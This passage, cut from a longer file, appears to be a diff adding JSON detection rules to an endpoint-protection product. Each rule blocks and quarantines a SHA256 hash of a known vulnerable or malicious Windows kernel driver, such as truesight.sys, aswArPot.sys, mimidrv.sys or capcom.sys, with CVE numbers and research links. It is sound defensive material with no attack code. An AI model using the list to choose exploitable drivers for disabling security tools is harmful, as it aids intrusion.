+ "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143750Z", + "creation_date": "2026-03-23T11:45:31.143754Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "898fcc32c0c37991f8d4322f24a33c1f39fd73b992d5f70c7393e9b870e46be6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9195dd54-7122-5e27-a305-a55aed05cc05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968970Z", + "creation_date": "2026-03-23T11:45:29.968972Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968977Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d43769b353d63093228a59eb19bba87ce6b552d7e1a99bf34a54eee641aa0ea", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, 
CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "919f386d-2cc9-5197-8489-dfff36a6f490", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143492Z", + "creation_date": "2026-03-23T11:45:31.143494Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143500Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bbe054c92229e0ddbdf7938d63488f95259f9fe7e67a216d1e6ce98bcbd10a4c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91b2498a-1f99-59cc-9823-a4dbe564ebd4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467239Z", + "creation_date": 
"2026-03-23T11:45:30.467242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467251Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e37671575137d4e726efe2cfb730455bfcc5c08d553330dc68840ce8f7c63280", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91c3b556-41bc-52b8-b2e6-71c0a5053403", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475016Z", + "creation_date": "2026-03-23T11:45:30.475020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475028Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "55054ac1fab3b2fb370640035d50d00ae41775c45a16d0737a11cef1da48faff", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91c9ccd6-d970-539d-a801-3d06b0290aa6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, 
+ "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972226Z", + "creation_date": "2026-03-23T11:45:29.972229Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972238Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee625d1910f91fc9e79237bd60b0ee5efb85c7f859922f30e4434db6cd50fa9b", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91db4c1a-0b1a-5124-8ac6-4e3b4c811f0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140907Z", + "creation_date": "2026-03-23T11:45:31.140909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140915Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ed3d20dba43947d133ffebe08eb9caf0ca0ad822929af6e3fa9c427fd3dba03", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91e6480f-a4b4-5263-bc8d-642f594bc441", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615537Z", + "creation_date": "2026-03-23T11:45:29.615539Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615544Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ef80a6b63766ca36e2f2a7d29c49dc5859a58604bd8fde15011d8c379f76e01", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91e709da-f699-50d7-afc6-87c9d5da2abc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469131Z", + "creation_date": "2026-03-23T11:45:30.469134Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469144Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c068b3c86f5776e9a26680952de22e156ec9700d9c1810e5fd344c994d50419", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91f1af97-5f41-539c-a3e6-1d00ce99e5df", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834270Z", + "creation_date": "2026-03-23T11:45:30.834273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834281Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "940cd600f3a673f646ab309e9d5f916d8071053f3b4b2cb078f3e2af3f9e887e", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "91f6c5ec-a8ae-5e8e-ac5a-002cf5d5acab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452341Z", + "creation_date": "2026-03-23T11:45:30.452344Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "743302af4224d5f44489290c01391c03b928126d726b72e7602fe5760e6d9519", + "comment": "Vulnerable Kernel Driver (aka phydmaccx64.sys) [https://www.loldrivers.io/drivers/96c8fe71-3acc-41bc-9402-ebd69a961d74/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9200d4ca-f255-598c-8d67-6c5906a24f4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971597Z", + 
"creation_date": "2026-03-23T11:45:29.971599Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971604Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b529550e8d2ec6133be50d7139179654301ff84ba09da0cd256c5dec924a185c", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "920b2e91-578b-53ae-8b73-3665e05db90c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810750Z", + "creation_date": "2026-03-23T11:45:31.810752Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810758Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "90c21147369071ed5a602577047866b8e752a25fc26e47459b3ef907f5cd0bfc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "920ff94f-7482-5884-afe7-594aef5fdedb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822246Z", + "creation_date": "2026-03-23T11:45:30.822248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822253Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f4647364210b9ec997483f9a707a733c4e1b59263c1046301dee90890273f34", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "922128af-2b93-5147-89d4-01d31de02675", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816344Z", + "creation_date": "2026-03-23T11:45:31.816348Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816380Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12017d1a1f91ae937850d8e4314f892125491f60893ee3f7de46c76edbb7b2d8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "922288eb-9c60-5443-ada1-0091e78f03ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144921Z", + "creation_date": "2026-03-23T11:45:32.144923Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144929Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "290bc7822da41f0b5580b27c8d14a2a5c3fbe3e4b6921957b134efc6beeb0aeb", + "comment": "Malicious Kernel Driver (aka driver_290bc782.sys) [https://www.loldrivers.io/drivers/f5c1a46f-21e6-4b06-b212-2dc55b699497/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9224f3a4-8c72-5a3b-b2bc-67e05a072ae3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620090Z", + "creation_date": "2026-03-23T11:45:29.620092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620097Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29", + "comment": "Intel vulnerable drivers (aka semav6msr.sys and piddrv64.sys) [https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92256309-07db-5ad7-adf5-b03b2103b634", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468665Z", + "creation_date": "2026-03-23T11:45:30.468668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468676Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"4f5166322f578fb111b6f2af375052008a5263311890f85c3e4ebc9c0f85affa", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92291545-1709-5502-92ef-498140151941", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968827Z", + "creation_date": "2026-03-23T11:45:29.968829Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968834Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f016c80c4938fbcd47a47409969b3925f54292eba2ce01a8e45222ce8615eb8", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "922c9706-07dd-5a3a-b0af-a56cea120412", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150616Z", + "creation_date": "2026-03-23T11:45:31.150618Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150624Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f007a84ac447535f44a5c473c73216d51b9bc597842a53eb292174bcc5ebaf73", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "922d36cf-2ab9-5075-84ce-fe8acc60c530", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465850Z", + "creation_date": "2026-03-23T11:45:30.465853Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465863Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a1e6b431534258954db07039117b3159e889c6b9e757329bbd4126383c60c778", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "922fc46f-1aa7-579a-ade9-6b5688d38fe4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978894Z", + "creation_date": "2026-03-23T11:45:29.978896Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978902Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f0eef1ed4c1278372348cb52e27dc3aa2f51a8b6a62db39d2af75031e55a8db", + "comment": "Vulnerable Kernel Driver (aka LgCoreTemp.sys) [https://www.loldrivers.io/drivers/2c3884d3-9e4f-4519-b18b-0969612621bc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "92302192-bd99-5149-ac27-6fd880d11b5c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150321Z", + "creation_date": "2026-03-23T11:45:31.150323Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.150329Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff4952837ec7e41feb582897123a7632c41d98d545ebe7936e1024972254ba07", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9232ee15-20b1-51c0-a21a-6473049d3b51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828837Z", + "creation_date": "2026-03-23T11:45:31.828839Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828844Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "515b1433d863c3c302442c23767325200edef64fab958eb59c6d00f319d473ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "925d698f-6af8-5f7a-8c71-8667641d520b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622088Z", + "creation_date": "2026-03-23T11:45:29.622090Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622095Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24", + "comment": "CapCom vulnerable driver (aka capcom.sys and smep_capcom.sys) [https://github.com/tandasat/ExploitCapcom] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9260e827-f00e-58f0-880f-e0ef15070889", + 